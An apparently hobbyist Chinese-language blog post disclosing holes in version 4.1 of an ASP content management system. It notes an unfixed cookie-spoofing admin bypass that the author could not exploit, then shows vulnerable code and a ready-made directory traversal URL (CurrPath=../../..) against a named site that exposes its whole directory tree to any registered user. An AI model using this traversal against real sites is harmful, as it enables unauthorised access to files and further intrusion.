对于前个3.1版本的cookies欺骗漏洞,http://www.st999.cn/blog/?action=show&id=315,本来错误的以为4.1的换成了seesion验证了,结果再次发现,竟然还是cookies验证,只不过是加了个referer验证而已。所以,这个后台欺骗漏洞我也没利用成功,,哪位朋友如果有办法利用的,麻烦到我的blog给我留言下,blog http://www.st999.cn/blog!!!
4.1这个版本里,我没找到其他的什么漏洞,基础太弱了,以后得好好学习,只发现了个列目录漏洞,可以浏览整个网站,对于拿shell,帮助不大。
利用前提:注册个用户并登录
漏洞成因:
Dim CurrPath,frames
strDirName=S("strDirName")
CurrPath= S("CurrPath")
frames =S("frames")
sUploadDir =ReturnChannelUserUpFilesDir(UserHS.UserName)&CurrPath
strDirName CurrPath frames 并没有过滤
而后直接把CurrPath这个代表路径的变量直接代入使用
Response.Write "<table width=100% border=1 align=center cellpadding=0 cellspacing=0 bordercolordark=FFFFFF bordercolorlight=658BD8>" & _
"<form action='?dir=" & sDir & "&CurrPath="&CurrPath&"&strDirName="&strDirName&"&frames="& frames &"' method=post name=myform >" & _
"<tr style='FONT-FAMILY: Verdana, Arial, 宋体;BACKGROUND-COLOR:#eeeeee'>" & _
"<td height=25>您现在的位置:上传文件管理目录 >> "
造成了可以直接用“..”来饶过路径限制
构造后的路径
http://www.st999.cn/User/selectupfile.asp?CurrPath=../../..
以至于这样就可以浏览整个网站目录。
这个东东对于拿shell没什么帮助,仅作自娱自乐之用!
